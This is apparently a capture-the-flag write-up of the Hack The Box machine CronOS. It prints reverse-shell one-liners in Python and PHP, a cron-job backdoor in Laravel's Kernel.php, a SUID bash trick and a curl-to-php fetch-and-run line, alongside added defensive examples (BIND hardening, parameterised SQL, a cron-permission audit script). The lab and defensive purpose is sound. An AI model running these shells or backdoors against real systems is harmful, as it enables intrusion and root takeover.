HTB CronOS Writeup

nmap:

Host is up (0.11s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP enum:

  • Default server page found for Apache2

Try nslookup: start nslookup, then type server followed by the target IP so the target's own nameserver answers the queries.

Now that we see it's hosting cronos.htb, let's try a zone transfer to discover any other subdomains.

dig AXFR cronos.htb @IP
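The defensive side of the zone transfer above, as an added example that is not part of this writeup: in BIND 9 (the nameserver version nmap identified) a zone with no allow-transfer statement can be pulled by any client, which is exactly what dig AXFR relies on. The zone file path and the secondary's address in the hardened version are placeholders.

```conf
// Weak: no allow-transfer, so BIND's default applies and any client may AXFR the zone
zone "cronos.htb" {
    type master;
    file "/etc/bind/db.cronos.htb";     // placeholder path
};

// Hardened: only the listed secondary may pull the zone; everyone else gets REFUSED
zone "cronos.htb" {
    type master;
    file "/etc/bind/db.cronos.htb";     // placeholder path
    allow-transfer { 10.0.0.2; };       // placeholder: the secondary's address
};
```

The same statement can go in the global options block (allow-transfer { none; };) as a default for every zone, with per-zone exceptions for real secondaries. Completed transfers are logged under BIND's xfer-out category, so an unexpected "AXFR started" line from an unknown client is a usable detection.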

Gobuster didn't have any luck.

Save the discovered subdomains to /etc/hosts.

Found the admin page.

Try SQL injection.

Save the POST request as login.req and run:

sqlmap -r login.req

Redirecting is happening.

Tried using '-- - in the user field and it worked! (Intercept the traffic in Burp Suite and URL-encode it.)
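Why a quote followed by a SQL comment gets past that login, and the fix, as an added example in Python with an in-memory SQLite table (this is not the box's login code, which the writeup never shows; the query shape, the table and the account are assumptions):

```python
"""Added example: string-built login query beside its parameterised form.
The query shape is an assumption; the real CronOS admin page is not shown."""
import sqlite3


def make_db():
    """In-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext password only to keep the demo short; real code stores a bcrypt/argon2 hash.
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    return conn


def login_vulnerable(conn, username, password):
    """Builds SQL by string concatenation: a quote in the input becomes SQL syntax."""
    query = (f"SELECT username FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    return conn.execute(query).fetchone() is not None


def login_hardened(conn, username, password):
    """Parameterised query: values travel separately from the SQL, quotes stay data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


# Same pattern as the `'-- -` trick above: close the string, then comment out the rest
# of the statement so the password clause is never evaluated. Constructed value.
INJECTED_USERNAME = "admin'-- -"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, injected user:", login_vulnerable(db, INJECTED_USERNAME, "wrong"))
    print("hardened, injected user:  ", login_hardened(db, INJECTED_USERNAME, "wrong"))
    print("hardened, real creds:     ", login_hardened(db, "admin", "correct-horse-battery"))
```

The vulnerable function returns True for the injected username with any password because SQLite, like MySQL, treats everything after `--` as a comment; the hardened one looks for a user literally named `admin'-- -` and finds none. Prepared statements, not input filtering, are the fix.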

Now we can execute any commands!

Adjusting the command section in Burp Suite, I was able to execute a command.

Let's try a one liner to get a reverse shell.

Tried:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.131",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Make sure to URL-encode it. Got the reverse shell!

Called the shell with python -c 'import pty; pty.spawn("/bin/sh")'

PrivEsc

  • Host linpeas.sh and run it

Found a suspicious cron job:

php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

The scheduler it runs executes the tasks defined in the application's console kernel:

"app/Console/Kernel.php"

https://vegibit.com/scheduling-commands-and-tasks-in-laravel/

How to set up a scheduled task that runs shell commands:

    protected function schedule(Schedule $schedule)
    {
        $schedule->exec('cd ~/Code/lpg && ls')
            ->everyMinute()
            ->sendOutputTo('/home/vagrant/Code/lpg/listing.txt');
    }

find / -name Kernel.php 2>/dev/null

    // Kernel.php entry; the inner single quotes are escaped so PHP does not end the string early
    $schedule->exec('php -r \'$sock=fsockopen("10.10.14.131",7777);exec("/bin/sh -i <&3 >&3 2>&3");\'')->everyMinute();

    // the command it runs, as a standalone one-liner
    php -r '$sock=fsockopen("10.10.14.131",7777);exec("/bin/sh -i <&3 >&3 2>&3");'

I located the file under the HTML root and downloaded it by visiting the site.

https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/

Used this guy's method:

Let's just make a temporary copy of bash (as root) and give it the SUID bit.

We add the following code to Kernel.php:

    protected function schedule(Schedule $schedule)
    {
        $cmd = 'cp $(which bash) /tmp/sbash; chmod +s /tmp/sbash';
        $schedule->exec($cmd)->everyMinute();
    }

…then wait a minute for the cron and eventually execute ./sbash -p from /tmp.

Another method would be to edit the artisan file and let the system download a reverse shell from our host and execute it.

    <?php system('curl http://10.10.14.57/reverse.php | php') ?>
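A defender's check for the weakness this whole privilege escalation rides on, both the Kernel.php edit and the artisan edit, added here as an example that is not code from the writeup, the box or Laravel: a cron job that root runs (php /var/www/laravel/artisan schedule:run) whose code lives in files a lower-privileged user can write, plus the setuid copy of bash it was used to plant in /tmp. The script parses crontab entries, stats the files they invoke, walks the application tree (artisan loads app/Console/Kernel.php, so checking the entry point alone is not enough) and lists setuid files under a directory. The directory layout, file modes and crontab line in demo() are constructed stand-ins; the audit functions take real paths.

```python
"""Audit for the cron-based privilege escalation above.
Added example, not code from the writeup, the box or Laravel."""
import os
import re
import stat
import tempfile

# /etc/crontab entry: five schedule fields, the user to run as, then the command.
CRONTAB_RE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")


def command_paths(cmd):
    """Absolute-path tokens of a cron command, skipping redirection targets under /dev."""
    return [t for t in cmd.split() if t.startswith("/") and not t.startswith("/dev/")]


def file_findings(path):
    """Reasons a file executed by a root cron job could be modified by someone else."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: does not exist"]
    findings = []
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable")
    elif st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        findings.append(f"{path}: writable by non-root group {st.st_gid}")
    if st.st_uid != 0:
        # On the box the Laravel tree belonged to www-data, so this is the finding that matters.
        findings.append(f"{path}: owned by uid {st.st_uid}, not root")
    return findings


def audit_crontab(text):
    """Check the files invoked by every root entry of a crontab."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment or VAR=value assignment
        m = CRONTAB_RE.match(line)
        if m and m.group("user") == "root":
            for path in command_paths(m.group("cmd")):
                findings.extend(file_findings(path))
    return findings


def audit_tree(root):
    """An interpreted entry point loads more code (artisan pulls in app/Console/Kernel.php),
    so apply the same test to every file of the application tree."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            findings.extend(file_findings(os.path.join(dirpath, name)))
    return findings


def find_setuid(root):
    """Regular files with the setuid bit under root; anything in /tmp or /var/tmp is suspect."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(p)
    return hits


def demo():
    """Constructed layout mirroring the box: root-owned scheduler entry point,
    world-writable Kernel.php, setuid bash copy in tmp. Returns the three audit results."""
    base = tempfile.mkdtemp()
    app = os.path.join(base, "var", "www", "laravel")
    tmp = os.path.join(base, "tmp")
    os.makedirs(os.path.join(app, "app", "Console"))
    os.makedirs(tmp)
    artisan = os.path.join(app, "artisan")
    kernel = os.path.join(app, "app", "Console", "Kernel.php")
    sbash = os.path.join(tmp, "sbash")
    for path, mode in ((artisan, 0o755), (kernel, 0o666), (sbash, 0o4755)):
        with open(path, "w") as fh:
            fh.write("placeholder\n")  # constructed stand-in for the real file
        os.chmod(path, mode)
    crontab = f"* * * * *\troot\tphp {artisan} schedule:run >> /dev/null 2>&1\n"
    return {"cron": audit_crontab(crontab), "tree": audit_tree(app), "setuid": find_setuid(tmp)}


if __name__ == "__main__":
    for section, items in demo().items():
        print(section)
        for item in items:
            print("  ", item)
```

Run as an unprivileged user the demo also reports every temp file as "not root", which is the same signal that would have flagged www-data's ownership of /var/www/laravel on the real box. The fix the audit points at is the usual one: code that a root cron job executes, directly or through an interpreter, must be owned by root and writable by nobody else, or the job must run as the service account that owns it.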
